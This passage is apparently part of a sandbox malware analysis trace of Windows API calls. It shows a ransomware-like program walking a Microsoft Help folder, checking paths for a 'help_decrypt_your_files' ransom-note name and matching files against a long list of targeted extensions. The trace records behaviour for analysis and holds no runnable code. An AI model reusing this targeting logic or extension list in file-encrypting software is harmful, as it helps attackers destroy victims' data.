big2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".hxn") returned 0x0
	[0177.852] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x5c587e17, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x5c587e17, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x5cee92c4, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.GRAPH.16.1033.hxn", cAlternateFileName="MSGRAP~1.HXN")) returned 1
	[0177.852] lstrcmpW (lpString1="MS.GRAPH.16.1033.hxn", lpString2="..") returned 1
	[0177.852] lstrcmpW (lpString1="MS.GRAPH.16.1033.hxn", lpString2=".") returned 1
	[0177.852] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\All Users\\Microsoft Help\\" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\") returned="C:\\Users\\All Users\\Microsoft Help\\"
	[0177.852] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.GRAPH.16.1033.hxn" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\MS.GRAPH.16.1033.hxn") returned="C:\\Users\\All Users\\Microsoft Help\\MS.GRAPH.16.1033.hxn"
	[0177.852] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.GRAPH.16.1033.hxn") returned 54
	[0177.852] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.853] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\MS.GRAPH.16.1033.hxn", cchLength=0x36 | out: lpsz="c:\\users\\all users\\microsoft help\\ms.graph.16.1033.hxn") returned 0x36
	[0177.853] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.853] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\ms.graph.16.1033.hxn", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.853] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\all users\\microsoft help\\ms.graph.16.1033.hxn" | out: lpString1="c:\\users\\all users\\microsoft help\\ms.graph.16.1033.hxn") returned="c:\\users\\all users\\microsoft help\\ms.graph.16.1033.hxn"
	[0177.853] lstrlenW (lpString="c:\\users\\all users\\microsoft help\\ms.graph.16.1033.hxn") returned 54
	[0177.853] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.853] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.853] StrStrW (lpFirst=".hxn", lpSrch=".") returned=".hxn"
	[0177.854] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.855] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".hxn") returned 0x0
	[0177.855] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x572bb221, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x572bb221, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x5732d888, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x164, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.GROOVE.16.1033.hxn", cAlternateFileName="MSGROO~1.HXN")) returned 1
	[0177.855] lstrcmpW (lpString1="MS.GROOVE.16.1033.hxn", lpString2="..") returned 1
	[0177.855] lstrcmpW (lpString1="MS.GROOVE.16.1033.hxn", lpString2=".") returned 1
	[0177.855] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\All Users\\Microsoft Help\\" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\") returned="C:\\Users\\All Users\\Microsoft Help\\"
	[0177.855] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.GROOVE.16.1033.hxn" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.16.1033.hxn") returned="C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.16.1033.hxn"
	[0177.855] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.16.1033.hxn") returned 55
	[0177.855] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.856] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\MS.GROOVE.16.1033.hxn", cchLength=0x37 | out: lpsz="c:\\users\\all users\\microsoft help\\ms.groove.16.1033.hxn") returned 0x37
	[0177.856] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.856] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\ms.groove.16.1033.hxn", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.856] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\all users\\microsoft help\\ms.groove.16.1033.hxn" | out: lpString1="c:\\users\\all users\\microsoft help\\ms.groove.16.1033.hxn") returned="c:\\users\\all users\\microsoft help\\ms.groove.16.1033.hxn"
	[0177.856] lstrlenW (lpString="c:\\users\\all users\\microsoft help\\ms.groove.16.1033.hxn") returned 55
	[0177.856] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.856] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.857] StrStrW (lpFirst=".hxn", lpSrch=".") returned=".hxn"
	[0177.857] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.857] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".hxn") returned 0x0
	[0177.857] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x58fe9daa, ftCreationTime.dwHighDateTime=0x1d8a64c, ftLastAccessTime.dwLowDateTime=0x58fe9daa, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x5943467f, ftLastWriteTime.dwHighDateTime=0x1d8a64c, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS.LYNC.16.1033.hxn", cAlternateFileName="MSLYNC~1.HXN")) returned 1
	[0177.857] lstrcmpW (lpString1="MS.LYNC.16.1033.hxn", lpString2="..") returned 1
	[0177.857] lstrcmpW (lpString1="MS.LYNC.16.1033.hxn", lpString2=".") returned 1
	[0177.857] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\All Users\\Microsoft Help\\" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\") returned="C:\\Users\\All Users\\Microsoft Help\\"
	[0177.858] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft Help\\", lpString2="MS.LYNC.16.1033.hxn" | out: lpString1="C:\\Users\\All Users\\Microsoft Help\\MS.LYNC.16.1033.hxn") returned="C:\\Users\\All Users\\Microsoft Help\\MS.LYNC.16.1033.hxn"
	[0177.858] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.LYNC.16.1033.hxn") returned 53
	[0177.858] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.858] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\MS.LYNC.16.1033.hxn", cchLength=0x35 | out: lpsz="c:\\users\\all users\\microsoft help\\ms.lync.16.1033.hxn") returned 0x35
	[0177.858] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.858] StrStrW (lpFirst="c:\\users\\all users\\microsoft help\\ms.lync.16.1033.hxn", lpSrch="help_decrypt_your_files") returned 0x0
	[0177.858] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\all users\\microsoft help\\ms.lync.16.1033.hxn" | out: lpString1="c:\\users\\all users\\microsoft help\\ms.lync.16.1033.hxn") returned="c:\\users\\all users\\microsoft help\\ms.lync.16.1033.hxn"
	[0177.858] lstrlenW (lpString="c:\\users\\all users\\microsoft help\\ms.lync.16.1033.hxn") returned 53
	[0177.859] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.859] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.859] StrStrW (lpFirst=".hxn", lpSrch=".") returned=".hxn"
	[0177.859] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.859] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.